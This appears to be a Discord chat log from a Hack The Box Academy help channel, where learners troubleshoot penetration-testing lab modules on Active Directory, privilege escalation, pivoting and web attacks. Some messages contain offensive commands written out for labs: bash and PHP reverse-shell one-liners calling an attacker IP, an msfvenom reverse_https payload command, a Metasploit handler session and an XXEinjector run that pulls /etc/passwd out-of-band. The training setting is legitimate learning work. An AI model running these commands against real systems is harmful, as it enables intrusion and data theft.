#modules

1 messages · Page 96 of 1

fathom pendant
#

Er

#

Whatever thre nessus port is

#

Sorry I'm half awake on melatonin

thorn urchin
#

😏

fathom pendant
analog dock
#

I keep getting this error whenever I try to rdp in when using my kali vm

fathom pendant
analog dock
analog dock
fathom pendant
#

Sometimes it's just dumb

analog dock
#

Lol

fathom pendant
#

¯_(ツ)_/¯

thorn urchin
#

Sometimes it just reads the password weird

analog dock
#

That’s why I put it within ‘

thorn urchin
#

so when in doubt ill take the password out and wait for it to prompt for pass and then copy paste

analog dock
#

Remmina is working fine for me though

thorn urchin
#

I like to get xfreerdp when I can though cause of pth and cause of the ability to mount a local folder as a file share. super ez pz file transfer that way.

#

idk if remmina can do that

analog dock
#

I prefer it as well

thorn urchin
#

technically yes

#

I have 💯 I just need to do report

#

so officially yes Im still doing the exam, but im not like 'doing' the exam

#

8 days to write my report feels nice

#

yeah but im bad at reports

#

so im glad to have so much time for it lol

fathom pendant
thorn urchin
#

im going to bed, technically was already in bed but had to check something and got distracted with discord for a sec

thorn urchin
#

i was loaded on caffeine and stuff for the exam today so going to bed right now is rough

#

my brain wouldnt shutup unless I quickly checked up something about ldapmodify

#

yeah throw insomnia in the mix for me

#

yup I feel it

fathom pendant
#

I'm honestly about out my legs don't wanna move to get up lol

vital adder
thorn urchin
#

offtopic but its nice seeing MrTom in green

vital adder
#

yea i learn that from one of the old AF machine in offshore or some other prolab

thorn urchin
#

but was hilarious to see him as a blue name just absolutely clowning on pro hackers with superior knowledge and politeness.

vital adder
thorn urchin
#

was wondering why he went quiet for awhile. turned out MrTom was just hyperbolic time chambering supercharging his rank

vital adder
analog dock
thorn urchin
#

lets not forget the copious amount of people that cheated to pro hacker specifically

#

I like saving screenshots of sus questions/answers

#

I have supreme confidence MrTom did, but some of the pro hackers hes helped? absolutely not lol

#

me? sure

#

also were way offtopic now

#

my bad

proud pine
#

It's fine - it's always near silent in here at this hour.

analog dock
#

I got pro hacker like 4 years ago, no way I would be able to get it now

#

Took a break for 3 years or so

vital adder
thorn urchin
#

that tracks

vital adder
#

but i may do the academy tutoring thing with jared or become a content writer or something like that for the academy

thorn urchin
#

go rewrite thick application section plz

vital adder
#

i'm still not sure what i will do with HTB yet but if i become an HTB official i will recruit you next madf0x 🤣 (and payloadbynny)

thorn urchin
#

lul

#

could be fun, but id rather get a pentesting position instead

vital adder
thorn urchin
#

it is

vital adder
#

oh really?

thorn urchin
#

I legitimately think it's the worst piece of academy content in all of academy

proud pine
thorn urchin
#

and they had to fix thick applications and its still bad

#

before hand it was literally broken

vital adder
proud pine
#

I thought the same. The wording is really weird on that.

thorn urchin
#

even a staff member was cussing with me on agreeing how bad it is

#

now its at least completable

wind rune
#

Anyone having any issues connecting to PwnBox right now? I keep getting "request validation failed" even after restarting browser and re-sign in to HTB

thorn urchin
#

if you just blindly follow the instructions and turn brain off

#

some sections are easier with pwnbox

thorn urchin
#

but yeah most people use VM

vital adder
#

wait do did the pwnbox go full circle?? before i think the pwnbox did get some good update the last time i check

#

yep

thorn urchin
#

eh its not about it being bad, its more just not gunna have the resources or customizability of your own vm

proud pine
#

pwnbox is aight, but I wouldn't trade my kali

thorn urchin
#

exactly

proud pine
#

and my i3 setup

thorn urchin
#

I used it a lot when we had a crazy slow month at work and I could work on modules during the day but only had work computer

signal geode
#

guys i need some help here is there a way to reset your module interface it has become a lot bigger suddenly and wont allow me to filter by tiers anymore

thorn urchin
#

my notes are light but dm the question anyways and maybe ill have it/remember

#

sweet, soldering can def be fun.

vital adder
#

ok i'm back from a chrome crash and yes

#

sure

analog dock
#

The last question of living off the land section from AD enumeration. I managed to get the flag by manually enumerating the users with admin privs, but the hint states it can be done with dsquery and ldap filters, how would that be done? Where would I be able to find those filters?

thorn urchin
#

ldapsearch could do it

#

and youd prob have to figure out the filter

analog dock
#

Question is “utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.”

thorn urchin
#

section has a nice explanation of filters and how to chain them together

#

so question is basically asking you to craft a custom filter

vital adder
#

i used the example command under Users With Specific Attributes Set (PASSWD_NOTREQD) but that command use 32 for password not required i just change that number to the thing i needed

analog dock
#

Using the command provided and changing 32 to 2

vital adder
#

yea that is for dsquery but i have no idea how to do it with ldap filters

analog dock
vital adder
#

oh yea you could be right (i'm dumb with both)

analog dock
#

Since the useracccontrol string is a ldap filter I believe

#

After finishing the cpts path I will do all of the ad modules

#

The higher priced ones as well

#

There’s an ldap and powerview module

vital adder
#

some resource are dead, there is some newer and just other stuff in general to that module is missing and there is i think some bug i has having with the module a while back

analog dock
#

Might just do crtp/e or crto then

thorn urchin
#

id suggest taking the time to learn ldapsearch because it forces you to deal with the guts of ldap better than the auto tools or powershell scripts

#

its a crucible of pain

#

but its given me an odd feeling of comfort with it even though Ive only scratched the surface

#

I prefer ldapsearch now

#

minus DACL enumeration, cause Security descriptors are binary blobs base64 encoded and you need an external tool to decode them into access rights

#

which made me really sad because that added a barrier to my plan of wanting to figure out how to abuse every DACL permission with ldapmodify

#

got GenericWrite/GenericAll stuff with it

#

adding users to group and setting spns

#

I almost got alh4zr3d to use ldapmodify for Absolute today but then he heard it went with ldapsearch and he had like PTSD and refused to use it and found a diff tool.

analog dock
thorn urchin
#

and then experimenting in academy labs

#

Did it cause Im stubborn and wanted to reduce my usage of powershell on hosts

#

its becoming more restricted and monitored

#

the less you HAVE to use it, the better imo

#

though obv not every engagement is gunna care

analog dock
#

I’ll probably just do the ldap module anyways, even if it’s not as good, it should at least give additional knowledge

thorn urchin
#

Im considering doing it as well.

#

people say Ive already exceeded it, but thats from clobbering together various scraps and synthesizing some new tricks for myself. So I wanna see what scraps it might have for me.

#

plus my actual foundational knowledge of ldap is still weak

#

I agree

#

Im slowly forming a weird love of it

#

thats the secret though

#

AD IS ldap

#

nope

#

smb is just windows

#

super duper minor distinction

#

Idk if you can have a linux DC, but theoretically you can have an entire AD network with only linux workstations and no samba

#

just youd have to be insane to set that up

proud pine
#

Would also be a warcrime.

thorn urchin
#

smb is just integral to windows, and since AD is windows centric they go together.

but ad and ldap? literally the same thing. Active Directory is just Microsoft's implementation with some ACL sprinkling magic and forced kerberos integration

#

but a DA with a single ldapmodify command could wipe out and brick the whole domain 🙂

maiden bear
#

Hi, iam stuck on windows privesc academy in powershell creds for user bob_adm

#

after i google a lot, my user as htb-student will never cant to decrypt powershell credential for other user

#

maybe anyone solve it ?

#

okey thanks then

autumn pilot
#

the password can be retrieved in plain text

maiden bear
#

with the $decrypted from imclilxml?

rustic sage
#

Hello im in the pivoting module in skills assement i have a webshell and i want a revershe shell, im using bash -i >& /dev/tcp/10.10.14.168/8080 0>&1 too im trying ``` php -r '$sock=fsockopen("10.10.14.168",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

#

do you change your username or a new VM?

#

do you change your network adapter or change your username in htb?

#

okay

rich flint
rustic sage
rich flint
#

oh yea

#

thanks

tough kettle
#

hey what thread is for seasonal boxes

tough kettle
#

i don't have access for lots of thread just give the name

fiery berry
maiden bear
autumn pilot
#

there is only one way written in the section that will help you retreive the cleartext password of the user

rich flint
#

is there a default extension that packages take on linux

west night
maiden bear
autumn pilot
#

The exercise is solvable, a suggestion that I can give you is to take a break and come back at it later again

maiden bear
#

Thanks, I already solved it. using GUI to access cleartext. i Just not tried harder before

mortal basin
quick cloud
#

wow these look so very good

#

cant wait till I know enough to do these modules

#

the Hard ones

autumn pilot
rare topaz
#

30$ module

#

😭

#

68$ per 1000 cubes, so that module alone costs 34$ 😭

lyric igloo
#

Guys which is the best language for programming?

gaunt monolith
#

In Attack common service easy lab why hydra can’t give me results when brute forcing password user ||fi**||@inlanefregiht.htb ?

#

Using pws.list from res I can’t find anything 🤔

fiery berry
gaunt monolith
pulsar needle
#

WHen posting a web request with data, if I want to try run a command why does it use ;ls;?

#

Instead of ip=ls

tough prawn
#

Hello Guys

#

I'm stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS -> ACL Enumeration
Q/ What privileges does the user damundsen have over the Help Desk Level 1 group?

#

I tired This Unfortunately it doesn't work
PS C:\Tools> $sid = Convert-NameToSid damundsen
PS C:\Tools> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} -

gaunt monolith
fiery berry
#

otherwise I'll dm you

rich flint
#

after completing linux fundamentals module, what should i learn next

analog dock
#

You just need to change the user to damundsen

tough prawn
tough prawn
fiery berry
#

the command looks fine to me, maybe there is another way to do it as "0x56" is suggesting

analog dock
#

There’s a different command used in the module that shows what you need

#

But in the module that command is used with a different user

tough prawn
#

Yes, I am surprised why it does not work stuck for 3 hours ):

analog dock
#

So change that to damundsen and it’ll show it

pulsar needle
#

Why do they use ;ls; instead of ls?

#

When sending a POST request

#

Like modifying the post requet

#

it was supposed to be ip=1 but in the instructions they changed it to ;ls;

#

but why not ls=

#

?

analog dock
#

And if it’s not shown then, you can find the answer under “further enumeration of rights using damundsen” the answer is shown in those rights

tough prawn
analog dock
#

You’re welcome 👍🏼

#

I just finished that part as well

zinc sentinel
#

https://academy.hackthebox.com/achievement/710422/51
the updated sections are top notch

pulsar needle
rustic sage
#

free hack learn

#

where?

pulsar needle
#

tryhackme or fundamentals modules on hackthebox

frigid socket
#

hello guys
is there anyway to reset the progress of academy modules?(preferably without having to pay again)

plain coral
pulsar needle
#

aaaaaaaaaaaaaaaaaaaaaaaa, thanks

#

Idk why i thought it was javascript

#

xd

odd gorge
#

Hello, stuck on Footprinting (Footprinting Lab Medium). I have logged onto the server, found creds for sa user but unable to authenticate to SQL Server.

plain coral
odd gorge
acoustic owl
odd gorge
#

Got it thanks!

polar widget
#

Challenging and fun module

vivid igloo
#

ayo am stuck here

#

Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?

#

Communication with Processes

#

WINDOWS PRIVILEGE ESCALATION

acoustic owl
vivid igloo
#

?

acoustic owl
vivid igloo
#

not working

vivid igloo
#

accesschk -dqv "\pipe\SQLLocal\SQLEXPRESS01" | findstr "WRITE_DAC"

acoustic owl
vivid igloo
vivid igloo
vivid igloo
#

and why this rdp session is closing again and agin this is getting on my nerves am using xfreerdp is there any alternative ?

#

@acoustic owl ?

acoustic owl
molten prawn
#

I bought a yearly subscription

acoustic owl
rare topaz
#

effective cost is 400 cubes, actual cost is 500 cubes.

You still need 500 to buy it in the first place.

torn blade
#

anyone know how to use XXEinjector and why it keeps giving me the "wrong HTTP file format" error for the blind data exfiltration module

tough prawn
#

Hi, The student package does not allow you to get cubes from solving the questions?

acoustic owl
tough prawn
acoustic owl
#

Okay, maybe the student subscription can't collect cubes, I really don't know.
With the silver annual subscription it was possible at that time to

tough prawn
#

Anyone who uses a student subscription ?

zinc sentinel
dull vortex
#

I am working on Pivoting Tunneling and Port Forwarding/Remote/Reverse Port Forwarding with SSH. Can someone explain why I am getting this error when trying to create my payload with msfvenom?

#

I am following the example from the module as it says to, but I am not sure what I am doing wrong here.

autumn pilot
#

seems like so

zinc sentinel
#

msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

restive lotus
#

any one up to nudge me? am doing the shells and payloads live engagement and need help with OS identification on host 2. I already got shell on it.

fathom pendant
#

If you have a shell you can get the os

restive lotus
#

i did but the challenge question accepts none of my input as the correct os

#

and the hint is 'proper scanning avoids poor performance' so i thought nmap -A or -O but no luck

fathom pendant
#

Probably a case of overthinking

dull vortex
supple patio
frigid socket
#

I'd like to reset my progress on the academy modules but can't find the option to do so. Can anyone point me in the right direction? Even the email of a member of staff would be appreciated

supple patio
#

I saw an option "Retake" when I finished the module, but it's same stuff like "View" on dashboard

frigid socket
#

The retake option isn't there anymore

#

just view

supple patio
frigid socket
#

considered creating a new account but I'd rather not pay for the modules again

supple patio
#

You may try to write it to support

#

But I don't think they would help

dull vortex
#

Now that I am working on the Pivoting Tunneling, and Port Forwarding... I am extremely happy that I spent two months this winter strictly studying networking(being that I didn't use it much in my SOC role at the time). Without that base, this stuff would be impossible to understand.

frigid socket
supple patio
fathom pendant
supple patio
frigid socket
#

thankyou everyone : )

supple patio
dull vortex
#

Maybe a stupid question, but is this actually supposed to be 0.0.0.0, or is it my attack machine IP?

restive lotus
#

no its ur attack machine 🙂

restive lotus
#

the lhost translates to listening host

#

that would be your attack machine listening for the reverse shell

supple patio
#

I mean from that windows to Ubuntu, then to your attack machine

dull vortex
#

thought so, just confused why it didn't show any explanation like it says for other IPs (<internalIPofPivotHost>, etc)

supple patio
#

I actually didn't understand it properly too, need to read stuff about it

fathom pendant
#

0.0.0.0 means listening on all ports

#

Er all interfaces

supple patio
supple patio
dull vortex
#

So I do set it to 0.0.0.0?

supple patio
fathom pendant
#

Yes

dull vortex
#

got it, thanks

fathom pendant
fathom pendant
#

:)

supple patio
#

Ty

#

That was the simplest explanation 🙂

fathom pendant
#

That means any system on any interface connection can connect to it on that port

supple patio
#

But computer is far away 😂

silent scarab
#

does anyone have a copy of the obsidian notebook from the Documentation and Reporting Module Resources? i tried downloading it from the resources but all the supposed pre-populated fields were empty. I think its due to me extracting without the password, but when i try unzipping the compressed zip folder, it doesnt ask me for a password... 😦 maybe im just dumb

restive lotus
#

I get this info thru the shell, but the challenge still does not accept my answer.. this is such a time waster.

fathom pendant
restive lotus
#

What distribution of Linux is running on Host-2? (Format: distro name, all lower case)

analog dock
#

So ubuntu?

#

The answer is right there right lol

supple patio
#

😂

restive lotus
#

...i was giving in the version.

#

bruh

analog dock
#

Lol

supple patio
#

Ahah

restive lotus
#

damn it thanks everyone

analog dock
#

You’re welcome 👍🏼

fathom pendant
#

The answer is often the simplest

supple patio
fathom pendant
#

Lol it's super easy to look over

restive lotus
#

i tend to screw those ones bad all the time T_T

#

i mean i see 'whats it running?' I think, OS and version >_< my bad

supple patio
restive lotus
#

with my self a lil bit lmfao

iron plaza
supple patio
hasty solar
#

can I dm anyone in Logrotate section LINUX PRIVILEGE ESCALATION module ?

hasty solar
zinc marsh
#

Someone who completed it please I cannot pass the last step of path traversal

iron plaza
zinc marsh
iron plaza
zinc marsh
#

just missing that shit for 3 days

acoustic owl
#

You do not need to compile anything

zinc marsh
#
PS C:\apps\raw> ```
#

This feeling when there is no error compiling sadglas

idle glade
#

Did you ever solve this? I'm literally on the box and can read the tomcat-users.xml file and I still can't get the right answer.

zinc marsh
#

finally

#

Why they thought it is a godd idea to do an insane machine in a slow box and with notepad, in an exercises from medium module and that u need to modify the source code 99 times NotLikeThis

maiden bear
#

Hi anyone Solving WINDOWS PRIIESC MODULES on Miscellaneous section ? any hint for this Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer. ?

maiden bear
marsh shadow
#

Hey y'all! I'm new to HTB and Cybersecurity in general, and am having an issue with the 'NTFS vs. Share Permissions' lesson in the 'Windows Fundamentals' module. I've made it to where I'm trying to mount to the share to gain access to the 'Company Data' folder using the following:

sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //ipaddoftarget/"Company Data" /home/user/Desktop/

I was replacing 'ipaddoftarget' with the target IP address for the windows machine, and 'user' in the directory with the Pwnbox username 'htb-***'.

I keep getting the following error in the Pwnbox terminal now:

Refer to the mount.cifs(8) manual page (e.g. man mount.cifs) and kernel log messages (dmesg)```
#

Any help would be greatly appreciated! I did also run this:

sudo apt-get install cifs-utils

to make sure that everything was installed.

sleek urchin
#

Doing AD Enumeration & Attacks - Skills Assessment Part II: Q4 and used kerbrute to find usernames and found and the intended password for the intended user, but kerebrute passwordspray gives me zero results

#

Done! Tested 57 logins (0 successes) in 0.197 seconds

static roost
#

@hasty solar Hey I'm struggling with that one as well .Can you drop a hint for me if you get it?

sleek urchin
#

any help is appreciated

hidden shell
marsh shadow
whole grotto
#

Hey everyone ! Can anyone tell me if I need to bruteforce david's password in the lab hard password attack?

#

Or else can someone give me a clue as to the usefulness of the password in keepass?

gaunt monolith
whole grotto
#

i cracked the keepass

#

keepass = database ?

gaunt monolith
#

In current user you are using you cant do anything with it so you will think about another way .. once you cracked you will know pass another user

fathom pendant
#

Did you log into the keypass?

gaunt monolith
#

So this way to complete your task

fathom pendant
#

Keypass is a password manager

static roost
#

@hasty solar I actually just got it. It's certainly not consistent. At least it wasn't on my end.

fathom pendant
whole grotto
#

ohhh

gaunt monolith
whole grotto
#

ok thank you both

fathom pendant
#

The pendulum swings back and forth for those labs

whole grotto
fathom pendant
#

Get to a thing to Crack, do it, get a new thing...

heady tusk
heady geyser
#

trying to xfreerdp into a windows machine in the bloodhound section. just get a blackscreen. ive rebooted and still having the same issue. issue on HTB side or my side?

#

ive used this command as well with no luck. xfreerdp /v:10.129.201.234 /u:'htb-student' /p:'Academy_student_AD!' /cert-ignore /tls-seclevel:0 /timeout:80000

fathom pendant
heady geyser
#

lmao, thanks

heady tusk
fathom pendant
#

It's been discussed a ton in this channel lol

heady tusk
#

Yeah in this one for sure, but haven't seen it in erratum I think (tho I don't check that one as regularly)

fathom pendant
#

Iirc it hasn't been discussed in erratum

heady tusk
#

Aight I'll write one later today then, thanks 🙂

keen compass
#

hi, has some of you already experienced msfconsole stuck on establishing session ?

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 2222
LPORT => 2222
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell_reverse_tcp
PAYLOAD => linux/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.228:2222 
[*] Command shell session 1 opened (10.10.14.228:2222 -> 10.129.57.62:46394) at 2023-06-26 21:27:06 +0100  <=== am stuck on this, every time I run my elf payload on my target
heady tusk
solid condor
# torn blade anyone know how to use XXEinjector and why it keeps giving me the "wrong HTTP f...

copy the request from burp like this:

POST /submitDetails.php HTTP/1.1
Host: 10.129.9.127
Content-Length: 136
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Sec-GPC: 1
Accept-Language: en-US,en
Origin: http://10.129.9.127
Referer: http://10.129.9.127/
Accept-Encoding: gzip, deflate
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

create a file:
nano xxe.req >> paste ..

ruby XXEinjector.rb --host=<your ip> --httpport=<your port> --file=path to xxe.req --path=/etc/passwd --oob=http --phpfilter

example

ruby XXEinjector.rb --host=10.10.11.12 --httpport=1312 --file= /home/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
after all you will see a new directory with name Logs .. inside you will find the log of the file you wanna read ..

hasty solar
#

im in the same section at the moment try looking for vhosts with ffuf

keen compass
zinc marsh
#

I discover all with gitlab

heady tusk
hasty solar
keen compass
zinc marsh
#

I just finished it

#

was missing the first question because I didnt know what format they wanted the answer

hasty solar
zinc marsh
#

as I told all can be found in the gitlab

hasty solar
#

ok gona enumerate that

hasty solar
drowsy crypt
#

Guys I don't understand on the module AD enum : we have to add damundsen on a group called "Help Desk Level 1" with "GenericAll" right but there are two errors :

  • damundsen have GenericWrite and not GenericAll
  • damundsen is already in the group Help Desk Level 1
    Why?
thorn urchin
#

either perm both gives the ability to add a user to the group you have the rights over

drowsy crypt
#

Yay but it is not correct in the course and the user is already in the group so there is no point in doing it again

thorn urchin
#

specifically which section are you on

drowsy crypt
#

ACL Abuse Tactics

thorn urchin
#

one moment then

drowsy crypt
#

But maybe it was done on purpose for him to already be in the group to answer the question more quickly

#

idk

halcyon pier
#

Good Day, Does any one get "file created from incompatible collector bloodhound" when using bloodhound-python?

thorn urchin
#

nope but it happens when youre ingestor and your bloodhound are on incompatible versions

#

so either bloodhound or bloodhound-python is too old for you

halcyon pier
#

hmm i use the one from pwnbox

#

guess i will need to find another way

thorn urchin
#

oh well

analog dock
#

Yes he is, I finished the same section today

vivid igloo
#

not able to find the user :Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?

#

Communication with Processes

#

WINDOWS PRIVILEGE ESCALATION

drowsy crypt
thorn urchin
red current
#

This is very odd. I'm in the Windows Priv Escalation module and one of the first questions in the Initial Enumeration section is who is a member of the Backup Operators group. I'm using the provided command and all I get are errors. The command should simply be >net localgroup backup operators, but that isn't working. Anyone else run into this or have any hints to get the command to work?

proud pine
red current
red current
vivid igloo
#

whats up with this

#

i even entered the all users name

#

i used accesschk -uwd "NT AUTHORITY\Authenticated Users" \pipe\SQLLocal\SQLEXPRESS01

#

still didn't worked it says i don't have privilege's ?

rough comet
#

getting some "socket error or timeout" errors when running nmap using proxychains (Dynamic Port Forwarding with SSH and SOCKS Tunneling) Pivoting module

#

can someone please DM ? I believe I am doing something wrong with my command. Although the right line is uncommented I believe

acoustic owl
vivid igloo
#

these are all the users and non of em are correct 😭

acoustic owl
zinc marsh
#

@acoustic owl 1 question about the attacking common applications

#

when u completed it u had the skill assessment iii?

rotund urchin
#

Can I DM someone about the Pivoting and Tunneling skills assesment? I am having issues findng the next hop.

rough comet
#

are you referring to 2nd question?

#

never mind

rotund urchin
#

it would be #6

rough comet
#

you are talking about the "skills assesment" I am not there yet, but can you help me with the dynamic port fwd part?

acoustic owl
thorn urchin
#

I finished it but I have zero notes on it

pine dagger
#

Has anyone done Secure Coding 101: Javascript? Looking to discuss the Encrypted Array chapter, and the 2nd question of the Skill Assessment. 🙂

zinc marsh
#

and complete this question What is the hardcoded password for the database connection in the MultimasterAPI.dll file?

#

so I think it is about the thick applications part

acoustic owl
zinc marsh
#

but I am getting sure there is nothing in the other ports first

acoustic owl
#

Open the File in ||dnSpy||

thorn urchin
#

oh yeah now I remember why I have zero notes on that section

#

yeah its like a 4 minute lab if you use the right tool

acoustic owl
zinc marsh
#

it is the only tool to use

acoustic owl
#

Yes, only one Tool

thorn urchin
#

eh there are others

acoustic owl
#

Yes, RDP

thorn urchin
#

but the one you rec is my favorite

acoustic owl
#

Oh, you mean you can solve it differently. Yes, of course. But you need only one tool on the client to solve the task

thorn urchin
#

correct

zinc marsh
thorn urchin
#

lul

zinc marsh
#

Finally

thorn urchin
#

also many .net apps are genuinely THAT easy irl

zinc marsh
#

I still cannot understand why the decided to add an insane box in the section

#

but well

thorn urchin
#

theres no insane box in the module

zinc marsh
thorn urchin
#

?

#

the sections are trash

#

but not insane

zinc marsh
#

this section

#

https://youtu.be/3bvKLj0akMM I had to do it following this video

00:00 - Intro
02:10 - Using wget to recursively download files off an annonymous FTP Server
06:00 - Attempting to execute the Java Thick Client, then switching to Java version 8 and trying again
08:00 - Seeing the Thick Client makes some DNS Requests, make the DNS Request resolve and attempt to intercept with Burp
11:00 - BurpSuite failed us, us...

▶ Play video
thorn urchin
#

I just followed the section instructions

#

the explanation is trash but the steps are correct

zinc marsh
thorn urchin
#

didnt know it was carved from an old insane box

acoustic owl
zinc marsh
#

I barely can do the active medium machines

acoustic owl
#

The modules marked with the label hard

thorn urchin
#

thats the important part

acoustic owl
thorn urchin
#

also not every segment of a box, even insane ones, are equally as challenging

acoustic owl
#

When is a box/module easy, medium, hard or insane?
Either you can solve it or not. The classification is totally irrelevant

thorn urchin
#

I was watching alh4zr3d do absolute on sunday, and I figured out the first several steps before he did. Doesnt mean I have the skills to finish the whole box like he does though

zinc marsh
#

I have 46/80 modules done for now

thorn urchin
#

nice

#

keep chugging

zinc marsh
#

when I finish the penetration role path I want repeat it all

#

just doing the exercises blind

#

and doing the machines they recommend + the 2 labs

rough comet
zinc marsh
#

so long journey, step by step

acoustic owl
#

There is always more to learn

rough comet
zinc marsh
#

that's why I like

ebon root
#

Can someone help me with the Skill assessment for module Stack-Based Buffer Overflows on Windows x86? I'm stuck on comparing the bytes and finding bad characters. Any help will be greatly appreciated.

zinc marsh
#

I have run linpeas and all the commands manually

#

cannot find any interesting file

zinc sentinel
pine dagger
#

Hey there, did you ever solve this?

zinc marsh
#

so they explain all the section to just search the flag with grep

zinc sentinel
# zinc marsh meh

Can confirm I wasted a significant amount of time on this yesterday before coming here and searching for answers and finding it in 0.2 seconds

zinc marsh
#

Linux Privilege Escalation -- Linux Services & Internals Enumeration

#

Is the question bugged?

thorn urchin
#

oh interesting new section I havnt done

zinc marsh
#

But it says it is wrong

acoustic owl
sly wave
#

Doing the Gettings Started module in Academy under PenTest path. On the "Service Scanning" section. On the first question for the exercises is asks for the version number of a service running on a specified port. I've enter the version number a million different ways and it hasn't been accepted. I used the hint to see if it gave a different way to pull the version number that spit it out in another format that it expected -- but the hint method doesnt even show the version number. Can anyone give me maybe an "x.x.x" or "xxxxxxx x.x.xx" so I know I'm barking up the right or wrong tree here?

#

direct link for the module

zinc sentinel
sly wave
thorn urchin
zinc marsh
#

it was the first I used

zinc sentinel
#

Oki u got it?

zinc marsh
#

I was writing the exact version

ebon root
#

Can someone help me with the Skill assessment for module Stack-Based Buffer Overflows on Windows x86? I'm stuck on comparing the bytes and finding bad characters. is this module broken?

solid wedge
#

Hey all were can I get tech support for HTB academy

acoustic owl
ebon root
solid wedge
#

yeah I dont have that I keep getting a pop up of Adblocker detected and I cant get rid of it in Google chrome

ebon root
#

try firefox

solid wedge
#

oh ok

solid wedge
#

we are go

#

all good

ebon root
#

Can someone help me with the Skill assessment for module Stack-Based Buffer Overflows on Windows x86? I'm stuck on comparing the bytes and finding bad characters. is this module broken?

obtuse quest
#

Hey everyone. I am doing the file transfer module. I am attempting to practice some of the upload and download methods from the linux transferring files section but whenever I use wget or curl I am receiving an error that the github host could not be resolved. Has anyone ran into this issue.

acoustic owl
obtuse quest
#

Welp there goes hours down the drain.

#

I appreciate it the insight!

tidal mango
#

I was going though the sqlmap course as a refresher, can anyone help me figure out the setting to pipe sqlmap through burp? I am using the --proxy flag but cannot get it to work. Thanks!

manic bramble
#

i'm having trouble with the ids evasion with nmap hard module. i've done a full -p- and used --source-port 53 but i can't get versions

balmy saffron
#

Hello,
In Socks over RDP, when I use mstsc.exe (as administrator) with IP 172.16.6.155 and user jason, I do not even reach the password box. It says the remote computer is turned off or remote access is turned off or it is not available on the network.
I already respinned the target.

#

I also tried with 172.16.5.155 since the .6 since inconsistent with the network.

#

*seems inconsistent

#

thx, but is the IP right? It does not look consistent with the network?

acoustic owl
#

Deactivate Real-time protection
If you do not, the DLL will be deleted.

balmy saffron
#

Thank you.

round gale
#

anyone having issues with vpn connectivity today?

#

mine keeps dropping

proud pine
vivid igloo
#

@acoustic owl

willow sonnet
#

Im facing an issue with the osticket part in attacking common applications. Both credentials in the sensitive data exposure for both email / user name dont work on the agent login page. I have restarted my instance a few times too and it still doesnt work

round gale
proud pine
round gale
#

yes, but for example when i switch to TCP, nikto for example will take around 15-20 minutes to complete, everything becomes really slow. but i will switch to TCP again and check

umbral wigeon
#

Require some help for Broken Authentication - Predictable Reset Token https://academy.hackthebox.com/module/80/section/779
Question: Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

Key points I did:
||1. Use server time (in milliseconds) --> I tried extracting using 2 methods: First, send a post request with submit:htbuser to get the success token reset page. Then get the "Date Response Header" or in my second method: the time specified in the html code using regex/beautifulsoup. I also tried manually clicking reset token and then calculating the epoch
2. Range from time - 1000 to time + 1000 (i did a little more in case, 2000ms)
3. Prepend with "htbadmin" as per the OpenMeeting bug in the notes

for x in range(start_time, now + 1):
# get token md5
total_str = "htbadmin"+str(x)
md5_token = md5(total_str.encode()).hexdigest()

The rest of the code is as per the template code

For a sanity, I tried the above steps using the prepend "htbuser" and tried to match the md5 hash I got from the website, but none of the 4000 hashes matched||

steady hawk
round gale
full echo
#

GTFOBins :0

nocturne bobcat
#

Hello all,
i am new to this domain, i working on the WEB REQUEST path POST module when i try to send the await fetch('/search.php', {
method : 'POST',
headers : {
'Content-Type':'application/json'
},
body :JSON.stringify({'search':'london'}),
});
i got the response
but when i try the
fetch('/search.php', {
method : 'POST',
headers : {
'Content-Type':'application/json'
},
body :JSON.stringify({'search':'flag'}),
});
i got nothing,only empty array

how will i solve this issue

proud pine
#

Are you sure powerview freezes? It does take a REALLY long time to run.

pine dagger
#

Did you finish Secure Coding?

proud pine
#

It's been a few months since I did the module, so I can't say for sure. While there are a lot of things that will show up on both, some things will only show up in powerview.

#

but when doing some of the object ACL enumeration, it can easily take 5+ minutes.

#

It's not necessarily even the speed of the machine, but the sheer number of objects that it goes over. The bigger the forest, the slower it will be.

#

If you do plan to use any of the commands involving Get-DomainObjectACL -Identity *, I would recommend instead just dumping those results to a variable, and then piping the variable to any of the other functions. That way, you can just use the same data, without having to wait again.

valid cipher
#

Does anyone know what this does grep -v "false\ |nologin"

#

I know grep -v makes it not include some lines

#

But what exactly is "false\ |nologin"

proud pine
valid cipher
#

what does \ do

#

Couldn't we instead do, grep -v "false" | grep -v "nologin"

proud pine
#

You have to use backslash to escape the pipe, so that grep knows that you're looking for multiple strings, and not to 'look' for pipes. You could use the method you suggested just the same, it's just less efficient.

broken warren
#

can someone help me with wfuzz im running it in the broken authentication module, and i keep getting errors saying the number of payloads doesn't match the number of FUZZ but i need a payload for my username and my passwordlist. I've tried doing it from the cheatsheet provided and if i do that it says i have TOO many arguements.

sullen torrent
#

i am doing the VULNERABILITY ASSESSMENT module and im just stuck as what needs to be done.

#

can anyone tell how do i even 'authenticate'?

round gale
#

whats the command to sort a text file based on minimum character number?

#

i got it, nevermind

fiery berry
pine dagger
#

